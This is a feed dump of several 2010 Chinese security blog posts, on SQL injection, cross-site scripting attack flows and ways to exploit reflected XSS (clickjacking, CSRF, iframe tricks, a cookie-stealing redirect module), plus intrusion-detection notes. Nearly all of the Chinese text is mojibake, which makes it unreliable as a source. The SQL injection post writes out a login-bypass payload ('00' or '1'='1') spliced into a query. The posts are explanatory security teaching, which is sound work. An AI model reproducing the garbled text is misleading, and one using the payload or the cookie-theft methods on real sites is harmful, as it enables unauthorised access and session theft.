    * 娉ㄥ叆婕忔礊鏀誨嚮鐨勬柟娉曢噸鐐瑰湪浜庡姩鎬佺綉欏靛瓨鍦ㄤ笉瀹夊叏鐨凷QL鐢熸垚璇彞

        鏈枃鍐呭閲嶇偣鍦ㄤ簬浠嬬粛娉ㄥ叆婕忔礊鐨勬敾鍑昏繃紼嬨?br>
        鍦ㄥ緢澶氬姩鎬亀eb搴旂敤涓紝浼氭彁渚涚粰鐢ㄦ埛杈撳叆鐨勬帴鍙o紝騫朵笖鏍規嵁鐢ㄦ埛鐨勮緭鍏ユ潵鐢熸垚鏁版嵁鎿嶄綔鐨凷QL璇彞銆傛瘮濡備竴涓畝鍗曠殑鐢ㄦ埛鐧誨綍瀵硅瘽紿椼?
        鎵璋撴敞鍏ユ紡媧烇紝鏄寚鍦ㄤ笂榪版弿榪扮殑閮ㄤ綅錛屽埄鐢ㄨ緭鍏ョ殑鏁版嵁鍙備笌鎵ц鐨勫師鐞嗭紝杈撳叆鎭舵剰鐨勫唴瀹癸紝榪涜岃鎭舵剰鍐呭鍙鎵ц銆備婦渚嬪涓嬶細

        鍦ㄤ竴涓櫥褰曠晫闈腑錛岀敤鎴瘋杈撳叆鑷繁鐨処D鍙峰拰瀵嗙爜鏉ュ畬鎴愮櫥褰曡繃紼嬶紝鐢熸垚鐨凷QL鍙兘鏄涓嬭繖涓牱瀛愶細
        select  *  from  t_users  where  user_name=' + 鐢ㄦ埛杈撳叆鐨処D + ' and user_pwd=' + 鐢ㄦ埛杈撳叆鐨勫瘑鐮?+'
        涓涓潪娉曠殑紿ユ帰鑰咃紝鍦ㄧ敤鎴稩D杈撳叆妗嗕腑杈撳叆 00'   or   '1'='1  騫跺湪瀵嗙爜妗嗛噷杈撳叆00錛岀敓鎴愮殑鏁翠釜SQL灝卞彉鎴愶細
        select  *  from  t_users  where  user_name='00‘  or   '1'='1'  and  user_pwd='00'
        榪欐牱錛屾煡璇㈡槸鏈夌粨鏋滅殑錛屽浜庝笉涓ュ瘑鐨勫垽鏂紝闈炴硶鐢ㄦ埛寰椾互榪涘叆璇ョ郴緇熴?br>
        涓婇潰鐨勪緥瀛愬睍紺轟簡闈炴硶鐧誨綍鐨勬墜孌點傚鏋滅敤浜庝駭鍝佹绱紝鍒欎竴涓櫘閫氱敤鎴鋒潈闄愮殑鐢ㄦ埛鍙互鐢ㄩ潪娉曟墜孌佃幏寰楀叏閮ㄤ駭鍝佸垪琛ㄣ傛洿涓ラ噸鐨勬儏鍐墊槸闈炴硶鐢ㄦ埛鍒╃敤榪欑婕忔礊鎵ц緋葷粺瀛樺偍榪囩▼錛屽緩绔嬬郴緇熺敤鎴鳳紝鎵撳紑緋葷粺闄愬埗錛屽畬鎴愮郴緇熺櫥褰曘?br>        
        濡傛灉鎴戜滑鍒╃敤鏁版嵁搴撳瓨鍌ㄨ繃紼嬫潵瀹屾垚媯绱紝鍒╃敤鍙傛暟浼犻掔殑鏂瑰紡鏉ヤ紶閫佸弬鏁幫紝灝卞彲浠ラ伩鍏嶈繖縐嶆儏鍐點?


灝忛粯 2010-04-14 14:18 鍙戣〃璇勮
]]>
銆愯漿銆慦EB瀹夊叏緋誨垪涔嬩竴錛歑SS璺ㄧ珯鑴氭湰鏀誨嚮http://m.shnenglu.com/momoxiao/archive/2010/04/14/112551.html灝忛粯灝忛粯Wed, 14 Apr 2010 06:14:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/14/112551.htmlhttp://m.shnenglu.com/momoxiao/comments/112551.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/14/112551.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/112551.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/112551.html    * 璺ㄧ珯鑴氭湰鏀誨嚮鍒╃敤鐨勯噸鐐規槸web鐢ㄦ埛錛堟祻瑙堣咃級鐨勫畨鍏ㄦ剰璇?br>    * 璺ㄧ珯鑴氭湰鏀誨嚮鐨勬妧鏈噸鐐瑰湪浜庤剼鏈槸鍦ㄧ敤鎴風鐨勬祻瑙堝櫒涓婅岄潪鏈嶅姟鍣ㄧ鐨勬湇鍔′笂鎵ц
    * 璺ㄧ珯鑴氭湰鏀誨嚮鐨勬柟娉曢噸鐐瑰湪浜庤鐢ㄦ埛鎵ц钘忔湁鎭舵剰浠g爜鐨勯摼鎺?/strong>

   鏈枃涓昏浠嬬粛璺ㄧ珯鑴氭湰鏀誨嚮鐨勮繃紼嬭屼笉鏄妧鏈粏鑺傘?br>
        
        鎴戜滑鍋囧畾涓変釜瑙掕壊錛氭敾鍑昏呫佺敤鎴楓佺綉涓婇摱琛屻?br>
        鏀誨嚮鐨勬祦紼嬩富瑕佸垎浠ヤ笅鍑犱釜姝ラ錛?br>
        1銆佹敾鍑昏呭彂閫丒MAIL錛屽叾涓甫鏈夋伓鎰忚剼鏈殑閾炬帴錛堥摼鎺ュ湴鍧鏄綉涓婇摱琛岋級錛涙垨鑰呮敾鍑昏呭湪鏌愮綉绔欎笂鎸傛帴甯︽湁鎭舵剰鑴氭湰鐨勯摼鎺ワ紙閾炬帴鍦板潃鏄綉涓婇摱琛岋級錛?br>  
        2銆佺敤鎴風偣鍑昏閾炬帴錛岃繛鍒扮綉涓婇摱琛岋紝鍚屾椂錛屽祵鍏ラ摼鎺ョ殑鑴氭湰琚敤鎴風殑嫻忚鍣ㄦ墽琛岋紝寮濮嬬洃瑙嗙敤鎴風殑緗戠粶榪炴帴錛?br>
        3銆佺敤鎴峰湪緗戜笂閾惰涓搷浣滐紝鍒氭墠琚墽琛岀殑鑴氭湰鏀墮泦鐢ㄦ埛鐨剆ession鍜宑ookie淇℃伅錛屽茍涓斿湪鐢ㄦ埛姣笉鐭ユ儏鐨勬儏鍐典笅鍙戦佺粰鏀誨嚮鑰咃紱

        4銆佹敾鍑昏呯敤鎼滈泦鏉ョ殑session淇℃伅錛屼吉瑁呮垚鍚堟硶鐢ㄦ埛榪涘叆璇ョ綉涓婇摱琛岃繘琛岃繚娉曟椿鍔ㄣ?br>
        鐢辨鍙錛岃鏀誨嚮鐨勯噸鐐瑰湪浜庤鏈夊彲鍒╃敤鐨勮剼鏈墽琛岀殑鍦版柟銆傚彧瑕佹湁鍙埄鐢ㄦ潵鎵ц鑴氭湰鐨勭┖闂達紝閮芥槸璇ユ敾鍑誨彲浠ュ疄鏂界殑鐩爣銆?br>
        鍦ㄧ洰鍓嶏紝璺ㄧ珯鑴氭湰鏄渶澶х殑瀹夊叏椋庨櫓銆?br>        
        緇存姢嫻忚鍣ㄥ畨鍏紝鏀瑰彉鎿嶄綔涔犳儻錛岃鐪熷寰呯湅鍒扮殑淇℃伅錛屼笉瑕侀殢鎰忕偣鍑繪偍鐨勯紶鏍囥?/font>

灝忛粯 2010-04-14 14:14 鍙戣〃璇勮
]]>
銆愯漿銆戙怲ODO銆戞祬璋堝弽灝勫瀷璺ㄧ珯鑴氭湰鏀誨嚮鐨勫埄鐢?/title><link>http://m.shnenglu.com/momoxiao/archive/2010/04/13/112503.html</link><dc:creator>灝忛粯</dc:creator><author>灝忛粯</author><pubDate>Tue, 13 Apr 2010 13:04:00 GMT</pubDate><guid>http://m.shnenglu.com/momoxiao/archive/2010/04/13/112503.html</guid><wfw:comment>http://m.shnenglu.com/momoxiao/comments/112503.html</wfw:comment><comments>http://m.shnenglu.com/momoxiao/archive/2010/04/13/112503.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/momoxiao/comments/commentRss/112503.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/momoxiao/services/trackbacks/112503.html</trackback:ping><description><![CDATA[<p>銆銆鍦╓eb 2.0鎶鏈殑鍙戝睍涓嬭秺鏉ヨ秺澶氱殑璁$畻宸ヤ綔琚斁鍒板鎴風澶勭悊錛岀敱浜庣▼搴忓憳鐨勭枏蹇斤紝瀵艱嚧浜嗚澶氱殑瀹夊叏婕忔礊銆傚浠婏紝闅忕潃XSS婕忔礊鐨勫嵄瀹蟲棩鐩婂澶э紝濡傛牎鍐呭拰baidu絀洪棿鍓嶉樀瀛愮殑XSS WORM絳夌瓑錛屽叾鍗卞涔嬪ぇ涔熷紩璧蜂簡澶у鐨勯噸瑙嗐?/p> <p>銆銆XSS鐨勭被鍨嬪ぇ浣撳垎涓轟袱縐嶏細鍙嶅皠鍨媂SS鍜屾寔涔呭瀷XSS錛岀浉姣斾箣涓嬶紝鍚庤呯殑鍒╃敤瑕佹瘮鍓嶈呮柟渚胯澶氥傜敋鑷寵澶氫漢璁や負鍙嶅皠鍨嬬殑XSS鏄浮鑲嬶紝鍥犱負鍏跺埄鐢ㄨ搗鏉ュ緢涓嶆柟渚匡紝浣嗗湪瀹夊叏鎶鏈閫熷彂灞曠殑浠婂ぉ錛岄浮鑲嬩篃鏈夊彉楦$繀鐨勪竴澶┿備笅闈㈡垜浠潵鐪嬬湅浠涔堟槸鍙嶅皠鍨媂SS.</p> <p>銆銆浠涔堟槸鍙嶅皠鍨媂SS</p> <p>銆銆XSS鍙堝彨CSS (Cross Site Script) 錛岃法绔欒剼鏈敾鍑匯傚畠鎸囩殑鏄伓鎰忔敾鍑昏呭線Web欏甸潰閲屾彃鍏ユ伓鎰廻tml浠g爜錛屽綋鐢ㄦ埛嫻忚璇ラ〉涔嬫椂錛屽祵鍏ュ叾涓璚eb閲岄潰鐨刪tml浠g爜浼氳鎵ц錛屼粠鑰岃揪鍒版伓鎰忔敾鍑葷敤鎴風殑鐗規畩鐩殑銆?/p> <p>銆銆閭d箞浠涔堟槸鍙嶅皠鍨媂SS鍛?榛戝摜瀵規垜璁茬殑鏄艦濡?<a 榪欐牱闇瑕佹楠楃敤鎴瘋嚜宸卞幓鐐瑰嚮閾炬帴鎵嶈兘瑙﹀彂XSS鐨勬槸鍙嶅皠鍨媂SS錛屽鍦ㄨ鍧涘彂璐村鐨刋SS灝辨槸鎸佷箙鍨嬬殑XSS.</p> <p>銆銆闈炴寔涔呮SS(Reflected cross-site scripting)錛屾槸鎴戜滑閫氬父鎵璇寸殑鍙嶅皠鍨媂SS錛屼篃鏄渶甯哥敤錛屼嬌鐢ㄦ渶騫跨殑涓縐嶆柟寮忋傚畠閫氳繃緇欏埆浜哄彂閫佸甫鏈夋伓鎰忚剼鏈唬鐮佸弬鏁扮殑URL錛屽綋URL鍦板潃琚墦寮鏃訛紝鐗規湁鐨勬伓鎰忎唬鐮佸弬鏁拌HTML瑙f瀽銆佹墽琛屻傚畠鐨勭壒鐐規槸闈炴寔涔呭寲錛屽繀欏葷敤鎴風偣鍑誨甫鏈夌壒瀹氬弬鏁扮殑閾炬帴鎵嶈兘寮曡搗銆?/p> <p>銆銆鎸佷箙鎬SS(Persistent cross-site scripting)錛屾寚鐨勬槸鎭舵剰鑴氭湰浠g爜琚瓨鍌ㄨ繘琚敾鍑葷殑鏁版嵁搴擄紝褰撳叾浠栫敤鎴鋒甯告祻瑙堢綉欏墊椂錛岀珯鐐逛粠鏁版嵁搴撲腑璇誨彇浜嗛潪娉曠敤鎴峰瓨鍏ラ潪娉曟暟鎹紝鎭舵剰鑴氭湰浠g爜琚墽琛屻傝繖縐嶆敾鍑葷被鍨嬮氬父鍦ㄧ暀璦鏉跨瓑鍦版柟鍑虹幇銆?/p> <p>銆銆寰堝浜洪潪甯擱剻瑙嗛潪鎸佷箙鎬SS(鍙嶅皠鍨媂SS)錛岃涓鴻繖縐峏SS鍙兘渚濋潬嬈洪獥鐨勬墜孌靛幓楠椾漢鐐瑰嚮錛屾墠鑳借鏀誨嚮姝e父瀹炴柦璧鋒潵銆傚叾瀹炶鍙嶅皠鍨媂SS鍙樺緱鎸佷箙鐨勬柟娉曪紝宸茬粡鍑虹幇榪囧ソ澶氭浜嗐傛瘮濡傚埄鐢╝pplet銆佸埄鐢╢lash鐨凙S鑴氭湰銆佸埄鐢↖E鐨凣host 欏甸潰錛孋ross Iframe Trick絳夌瓑銆?/p> <p>銆銆鍙嶅皠鍨媂SS鐨勫父瑙佸埄鐢ㄦ柟娉?/p> <p>銆銆鏃㈢劧鏄?#8220;闇瑕佹楠楃敤鎴瘋嚜宸卞幓鐐瑰嚮閾炬帴鎵嶈兘瑙﹀彂XSS”錛岄偅鍒╃敤鍙嶅皠鍨媂SS宀備笉鏄彧鏈夊幓蹇芥偁鐢ㄦ埛榪欎竴縐嶆柟娉?鏀懼湪鍑犲勾鍓嶄篃璁告槸榪欐牱鐨勶紝鐜板浠婏紝灝辮涓婃紨楦¤倠鍙橀浮緲呯殑濂芥垙浜?</p> <p>銆銆·嬈洪獥</p> <p>銆銆涓嶅緱涓嶈榪欐槸鏈綆鍗曟湁鏁堢殑鍒╃敤鏂規硶浜嗭紝浣嗗蹇芥偁鐨勮兘鍔涙湁涓ユ牸鐨勮姹傦紝涓嶇劧鐢ㄦ埛涓嶄細閭d箞瀹規槗涓婇挬鐨勩傚叾嬈★紝鐜板湪鐨勭敤鎴烽兘鏈変簡涓瀹氱殑瀹夊叏鎰忚瘑錛屼篃涓嶆槸閭d箞濂介獥浜嗐備互涓婇潰鎻愬埌鐨勯摼鎺ヤ負渚嬶紝鐢變簬鏄疦ASA緗戠珯鐨勮法绔欙紝澶у瀹屽叏鍙互鍦ㄤ竴浜涘ぉ鏂囩埍濂借呰仛闆嗙殑緹ら噷鍙戠被浼艱繖鏍風殑娑堟伅錛屽錛?#8220;緹庡浗鑸┖鑸ぉ灞鍏竷鏈鏂癠FO鐓х墖”鐒跺悗鍔犱笂鎴戜滑鐨勯摼鎺ャ傜敱浜庢槸NASA鐨勯摼鎺?鐜板湪榪炲皬瀛︾敓閮界煡閬揘ASA鏄共浠涔堢殑)錛屾垜鎯沖簲璇ヤ細鏈変竴閮ㄥ垎浜虹浉淇¤屽幓鐐瑰嚮浠庤岃揪鍒頒簡鎴戜滑鐨勭洰鐨勶紝榪欎釜鍙嶅皠鍨嬬殑XSS琚Е鍙戙備絾濡傛灉涓嶆槸榪欎箞紕板閥鍛?璇峰線涓嬬湅銆?/p> <p>銆銆·ClickJacking</p> <p>銆銆鍦ㄥ幓騫寸殑OWASP浼氳涓婏紝ClickJacking榪欑鏀誨嚮鏂瑰紡琚彁浜嗗嚭鏉ャ傜畝鍗曟潵璇碈lickJacking澶ц嚧鏄繖涔堝洖浜嬶細</p> <p>銆銆1. 琛ㄧ幇涓虹偣鍑繪煇涓摼鎺ユ垨button鏃訛紝瀹為檯涓婃槸鐐瑰嚮鍒板埆鐨勫湴鏂瑰幓浜?鍔寔閾炬帴)</p> <p>銆銆2. 涓嶄竴瀹氶渶瑕乯avascript錛屾墍浠oscript涔熸尅涓嶄綇錛屼絾鏄鏋滄湁javascript浼氳浜嬫儏鏇寸畝鍗?/p> <p>銆銆3. 鏀誨嚮鏄熀浜嶥HTML鐨?/p> <p>銆銆4. 闇瑕佹敾鍑昏呬竴瀹氱▼搴︿笂鎺у埗欏甸潰</p> <p>銆銆鎵浠ワ紝鎴戜滑鍙灝嗙敤鎴風殑鐐瑰嚮鍔寔鍒版垜浠殑閾炬帴涓婂幓灝辮浜嗭紝鑰屼笖ClickJacking鏄彲浠ヨ法鍩熺殑鍝</p> <p>銆銆鍏蜂綋搴旂敤紺轟緥澶у鍘籫oogle涓嬪氨鏈変簡銆?/p> <p>銆銆·緇撳悎CSRF鎶鏈?/p> <p>銆銆CSRF鏄吉閫犲鎴風璇鋒眰鐨勪竴縐嶆敾鍑伙紝CSRF鐨勮嫳鏂囧叏縐版槸Cross Site Request Forgery錛屽瓧闈笂鐨勬剰鎬濇槸璺ㄧ珯鐐逛吉閫犺姹傘傝繖縐嶆敾鍑繪柟寮忔槸鍥藉鐨勫畨鍏ㄤ漢鍛樹簬2000騫存彁鍑猴紝鍥藉唴鐩村埌06騫村垵鎵嶈鍏蟲敞銆?/p> <p>銆銆緇撳悎CSRF鎶鏈潵鍒╃敤鍙嶅皠鍨媂SS鏄涓嶉敊鐨勬柟娉曪紝鍒╃敤CSRF鍙互浣垮緱榪欎簺涓嶅ソ鍒╃敤鐨刋SS婕忔礊鍙樺緱濞佸姏鏃犵┓銆傚叿浣撶ず渚嬭鍙傝冧綑寮︾殑銆婂熀浜嶤SRF鐨刋SS鏀誨嚮銆?<a >http://huaidan.org/archives/2561.html</a>)錛岃繖閲屽氨涓嶇粏璇翠簡錛屾湁鏈轟細涓撻棬鍐欑瘒鍏充簬CSRF鐨刾aper.</p> <p>銆銆·Cross Iframe Trick</p> <p>銆銆鍏堣璁茶繖縐嶆敾鍑昏兘澶熻揪鎴愪粈涔堟晥鏋滐細</p> <p>銆銆1. 璺ㄥ煙鎵ц鑴氭湰(IE銆丗irefox)</p> <p>銆銆2. 鎶婇潪鎸佷箙鎬SS鍙樻垚鎸佷箙鎬SS 鈥斺?gt;!!!</p> <p>銆銆3. 璺ㄩ〉闈㈡墽琛岃剼鏈?/p> <p>銆銆榪欑鏀誨嚮鏂規硶姣旇緝緇曪紝鍏蜂綋璇峰弬鑰冦奀ross Iframe Trick銆?<a >http://hi.baidu.com/aullik5/blog/item/07d68eb015d72652092302b1.html</a>)</p> <p>銆銆·鍙嶈漿闆呭吀濞溾斺旈厤鍚圓nehta鐨勫洖鏃嬮晼妯″潡</p> <p>銆銆浠涔堟槸Anehta? Anehta鏄竴涓法绔欒剼鏈敾鍑?XSS)鐨勫埄鐢ㄥ鉤鍙般傚姛鑳芥ā鍧楀寲錛屽紑鍙戣呭彲浠ュ崟鐙負anehta寮鍙戝悇縐嶅悇鏍風殑妯″潡錛屼互婊¤凍鐙壒鐨勯渶姹傘侫nehta涓湁璁稿鐨勫叿鏈夊垱鎰忕殑璁捐錛屽洖鏃嬮晼妯″潡(Boomerang)錛屽氨鏄叾涓竴涓傚洖鏃嬮晼妯″潡鐨勪綔鐢紝鏄負浜嗚法鍩熻幏鍙栨湰鍦癱ookie錛屽彧鏄湪绔欑偣涓婃湁涓涓猉SS錛岀綾諱笉闄愶紝涓嶇鏄弽灝勫瀷XSS錛岃繕鏄寔涔呭瀷XSS錛岄兘鍙互涓烘垜浠伐浣溿?/p> <p>銆銆榪欐椂錛屽弽灝勫瀷XSS鐨勪綑鐑氨琚厖鍒嗙殑鍙戞尌浜嗐?/p> <p>銆銆嫻呮瀽Anehta鍥炴棆闀栨ā鍧楀伐浣滃師鐞?/p> <p>銆銆鏃㈢劧鎻愬埌浜咥nehta鐨凚oomerang妯″潡錛岄偅灝辯畝鍗曡璇村惂銆?/p> <p>銆銆Boomerang鐨勫伐浣滃師鐞嗭細鎴戜滑鐭ラ亾錛屾祻瑙堝櫒琚玐SS鏀誨嚮鍚庯紝鏀誨嚮鑰呭彲浠ョ敤js鎴栧叾浠栬剼鏈帶鍒舵祻瑙堝櫒鐨勮涓恒傝繖鏃跺欏鏋滄垜浠己鍒舵祻瑙堝櫒鍘昏闂珯鐐笲涓婁竴涓瓨鍦╔SS婕忔礊鐨勯〉闈紝灝卞彲浠ョ戶緇敤B绔欎笂鐨刋SS_B鎺у埗鐢ㄦ埛鐨勬祻瑙堝櫒琛屼負; 閭d箞鎶婃暣涓繃紼嬬粨鍚堣搗鏉ワ紝綆鍗曡〃紺哄涓嬶細</p> <p>銆銆victim Browser 鈥斺?gt;site A錛孹SS_A 鈥斺?redirect to 鈥斺?gt;Site B錛孹SS_B 鈥斺?redirect somewhere 鈥斺?gt;……</p> <p>銆銆鍦↖E涓紝iframe銆乮mg絳夋爣絳鵑兘鏄嫤鎴湰鍦癱ookie鐨勩傞渶瑕佷嬌鐢ㄤ笉鎷︽埅cookie鐨勬瘮濡?window.open絳夋柟娉曪紝浣嗘槸window.open浼氳IE鎷︽埅寮瑰嚭紿楀彛錛屾墍浠xis鐗涘湪Boomerang涓嬌鐢ㄤ簡琛ㄥ崟鎻愪氦錛屾瀯閫犱竴涓猣orm錛屽悜site B鎻愪氦錛岀劧鍚庡啀浠嶴ite B瀵煎叆涓涓猉SS B錛岃幏鍙栦簡cookie鍚庯紝鍐嶉氳繃琛ㄥ崟鎻愪氦錛岃煩杞洖鍘熸潵鐨凷ite A.濡傛灉鍦⊿ite B涓婏紝浣跨敤XSS_B鍐嶅皢欏甸潰閲嶆柊瀹氬悜鍥?Site A錛岄偅涔堝浜庣敤鎴鋒潵璇達紝灝辨槸綆鍗曠殑闂簡涓涓嬶紝闈炲父鍏鋒湁嬈洪獥鎬э紝鏁翠釜榪囩▼灝卞儚鐢ㄥ洖鏃嬮晼鎵斿嚭鍘繪墦浜嗕竴涓婤涓鏍楓?/p> <p>銆銆浣嗗叾瀹炶繖騫舵病鏈夋妸鍙嶅皠鍨媂SS鐪熸鐨勫彉鎴愭寔涔呭瀷鐨刋SS錛屽彧鏄弽灝勫瀷XSS鐨勪竴縐嶆敾鍑繪柟寮忚屽凡錛屼篃娌℃湁璺ㄥ煙錛岃屾槸URL閲嶅畾鍚戣漿浜嗕竴鍦堬紝璺充簡涓鍦堝張鍥炴潵浜嗐備絾榪欑‘瀹炴槸璁╁弽灝勫瀷XSS寰楀埌浜嗗厖鍒嗙殑鍒╃敤錛岃揪鍒頒簡鎴戜滑鐨勭洰鐨勩俛xis鐗涚殑榪欑鎬濊礬闈炲父鍊煎緱鎴戜滑瀛︿範!</p> <p>銆銆灝忕粨</p> <p>銆銆鏈枃鍙葷粨浜嗗父瑙佺殑鍙嶅皠鍨媂SS鍒╃敤鐨勬柟娉曪紝浣嗛兘鏄畝鍗曠殑鎻愪簡涓嬶紝璧峰埌浜嗕釜鎶涚爾寮曠帀鐨勪綔鐢紝璁╁ぇ瀹惰鍒板弽灝勫瀷XSS鏃惰兘鎯沖埌榪欎簺(璨屼技瑕侀兘璇︾粏鍐欏嚭鏉ュ氨澶浜? -錛?錛屽鏈変笉瓚充箣澶勮繕璇峰悇浣嶈璋呫?/p> <img src ="http://m.shnenglu.com/momoxiao/aggbug/112503.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/momoxiao/" target="_blank">灝忛粯</a> 2010-04-13 21:04 <a href="http://m.shnenglu.com/momoxiao/archive/2010/04/13/112503.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>regsvr32.exehttp://m.shnenglu.com/momoxiao/archive/2010/04/12/112278.html灝忛粯灝忛粯Sun, 11 Apr 2010 16:23:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/12/112278.htmlhttp://m.shnenglu.com/momoxiao/comments/112278.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/12/112278.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/112278.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/112278.html
regsvr32.exe /u DLL鍚嶇О
鍙嶆敞鍐孌LL錛堢郴緇熷皢榪欎釜DLL縐誨嚭寮鏈烘墍蹇呴』鎵ц鐨勫垪琛級錛屾鏃惰繖涓狣LL榪樺湪榪愯錛岄噸鍚悗涓嶅啀琚姞杞斤紝鍒犻櫎鍗沖彲

灝忛粯 2010-04-12 00:23 鍙戣〃璇勮
]]>
鍏ヤ鏡媯嫻嬫妧鏈?//TODOhttp://m.shnenglu.com/momoxiao/archive/2010/04/10/112187.html灝忛粯灝忛粯Sat, 10 Apr 2010 09:24:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/10/112187.htmlhttp://m.shnenglu.com/momoxiao/comments/112187.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/10/112187.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/112187.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/112187.html鏁寸悊from:  infosec.pku.edu.cn 
鏈畬
--------------------------------------------

鍏ヤ鏡媯嫻嬬郴緇燂紙
IDS錛?/span>Instruction Detection System錛夛細榪涜鍏ヤ鏡媯嫻嬬殑杞歡鍜岀‖浠剁殑緇勫悎銆?/span>

鍏ヤ鏡媯嫻嬬殑璧鋒簮鍜屽垎綾?/span>

瀹¤鎶鏈細浜х敓銆佽褰曞茍媯鏌ユ寜鏃墮棿欏哄簭鎺掑垪鐨?strong style="mso-bidi-font-weight: normal">緋葷粺浜嬩歡璁板綍鐨勮繃紼嬨?/span>

瀹¤鐨勭洰鏍囷細

­            紜畾鍜屼繚鎸佺郴緇熸椿鍔ㄤ腑姣忎釜浜虹殑璐d換

­            閲嶅緩浜嬩歡

­            璇勪及鎹熷け

­            媯嫻嬬郴緇熺殑闂鍖?/span>

­            鎻愪緵鏈夋晥鐨勭伨闅炬仮澶?/span>

­            緇勭粐緋葷粺鐨勪笉姝e綋浣跨敤

瀹¤鐨勫墠鎻愶細鏈変竴涓敮閰嶅璁$殑瑙勫垯闆?/strong>銆?/span>

 

瑙勫垯闆嗭細閫氬父浠ュ畨鍏ㄧ瓥鐣ョ殑褰㈠紡鏄庣‘琛ㄨ堪銆?/span>

綺劇畝瀹¤錛岄闄╁拰濞佽儊鍒嗙被銆?/span>

瀹炴椂鍏ヤ鏡媯嫻嬬郴緇燂紝鎻愬嚭鍙嶅父媧誨姩涓庤綆楁満涓嶆褰撲嬌鐢ㄤ箣闂寸殑鐩稿叧鎬с?/span>

鍩轟簬涓繪満鐨勫叆渚墊嫻?/span>

鍩轟簬涓繪満鍜屽熀浜?strong style="mso-bidi-font-weight: normal">緗戠粶鍏ヤ鏡媯嫻嬬殑闆嗘垚

 

銆?/span>Computer Security Threat Monitoring and Surveillance銆?/span>, James P. Anderson

銆婅綆楁満瀹夊叏濞佽儊鐩戞帶涓庣洃瑙嗐?/span>

­            綺劇畝瀹¤鐨勭洰鏍囧湪浜庝粠瀹夊叏瀹¤璺熻釜鏁版嵁涓秷闄ゅ啑浣欐垨鏃犲叧鐨勮褰曘?/span>

­            璁$畻鏈虹郴緇熷▉鑳佸垎綾伙細澶栭儴娓楅忋佸唴閮ㄦ笚閫忓拰涓嶆硶琛屼負銆?/span>

­            鎻愬嚭浜嗗埄鐢ㄥ璁℃暟鎹窡韙洃瑙嗗叆渚墊椿鍔ㄧ殑鎬濇兂銆?/span>

 

NSM(Network Security Minitor)

­            絎竴嬈″皢緗戠粶嫻?/strong>浣滀負瀹¤鏁版嵁鐨勬潵婧愶紝鍥犺屽彲浠ュ湪涓嶅皢瀹¤鏁版嵁杞崲鎴愮粺涓鏍煎紡鐨勬儏鍐典笅鐩戞帶寮傚艦涓繪満銆?/span>

­            涓ゅぇ闃佃惀姝e紡鎴愮珛錛氬熀浜庣綉緇滅殑IDS鍜屽熀浜庝富鏈虹殑IDS

 

DIDS //???

鏈鏃╄瘯鍥炬妸鍩轟簬涓繪満鍜岀綉緇滅洃瑙嗙殑鏂規硶闆嗘垚鍦ㄤ竴璧楓?/span>

 

IDS鍩烘湰緇撴瀯

涓変釜鍔熻兘閮ㄤ歡錛氫俊鎭敹闆嗐佷俊鎭垎鏋愩佷俊鎭鐞嗐?/span>

 

1錛庝俊鎭敹闆嗭細

緋葷粺鎴栫綉緇滅殑鏃ュ織鏂囦歡銆傛棩蹇椾腑璁板綍浜嗚涓虹被鍨嬪強鍏朵俊鎭?/span>

濡?#8220;鐢ㄦ埛媧誨姩”錛?/span>

­            淇℃伅錛氱櫥闄嗭紝鐢ㄦ埛ID鏀瑰彉錛岀敤鎴峰鏂囦歡鐨勮闂紝鎺堟潈錛岃璇佷俊鎭瓑銆?/span>

­            涓嶆湡鏈涚殑琛屼負錛氶噸澶嶇櫥闄嗗け璐ワ紝鐧誨綍鍒頒笉鏈熸湜鐨勪綅緗紝闈炴巿鏉冪殑浼佸浘璁塊棶閲嶈鏂囦歡絳夈?/span>

 

2錛庝俊鎭垎鏋愶細

妯″紡鍖歸厤錛堣鐢ㄦ嫻嬶級

­            灝嗘敹闆嗗埌鐨勪俊鎭?strong style="mso-bidi-font-weight: normal">涓庡凡鐭?/strong>緗戠粶鍏ヤ鏡鍜岀郴緇熻鐢ㄦā寮忕殑鏁版嵁搴撹繘琛屾瘮杈?/strong>錛屼粠鑰屽彂鐜拌繚鑳屽畨鍏ㄧ瓥鐣ョ殑琛屼負銆?/span>

­            涓鑸竴涓?strong style="mso-bidi-font-weight: normal">榪涙敾妯″紡鍙互鐢ㄤ竴涓?strong style="mso-bidi-font-weight: normal">榪囩▼錛堝鎵ц涓鏉℃寚浠わ級鎴栦竴涓?strong style="mso-bidi-font-weight: normal">杈撳嚭錛堝鑾峰緱鏉冮檺錛夋潵琛ㄧず銆傝榪囩▼鍙互寰堢畝鍗曪紙濡傞氳繃瀛楃涓插尮閰?/strong>浠ュ鎵句竴涓畝鍗曠殑鏉$洰鎴栨寚浠?/strong>錛夛紝涔熷彲浠ュ緢澶嶆潅錛堝鍒╃敤姝h鐨勬暟瀛﹁〃杈懼紡鏉ヨ〃紺?strong style="mso-bidi-font-weight: normal">瀹夊叏鐘舵佺殑鍙樺寲錛夈?/span>

緇熻鍒嗘瀽錛堝紓甯告嫻嬶級

­            棣栧厛緇欑郴緇熷璞★紙濡傜敤鎴楓佹枃浠躲佺洰褰曞拰璁懼絳夛級鍒涘緩涓涓粺璁℃弿榪幫紝緇熻姝e父浣跨敤鏃剁殑涓浜涙祴閲忓睘鎬э紙濡傝闂鏁般佹搷浣滃け璐ユ鏁般佸歡鏃剁瓑錛夈?/span>

­            嫻嬮噺灞炴х殑騫沖潎鍊煎皢琚敤鏉ヤ笌緗戠粶銆佺郴緇熺殑琛屼負榪涜姣旇緝錛屼換浣曡瀵熷煎湪姝e父鑼冨洿涔嬪鏃訛紝灝辮涓烘湁鍏ヤ鏡鍙戠敓銆?/span>

瀹屾暣鎬у垎鏋愶紙寰寰鐢ㄤ簬浜嬪悗鍒嗘瀽錛?/span>

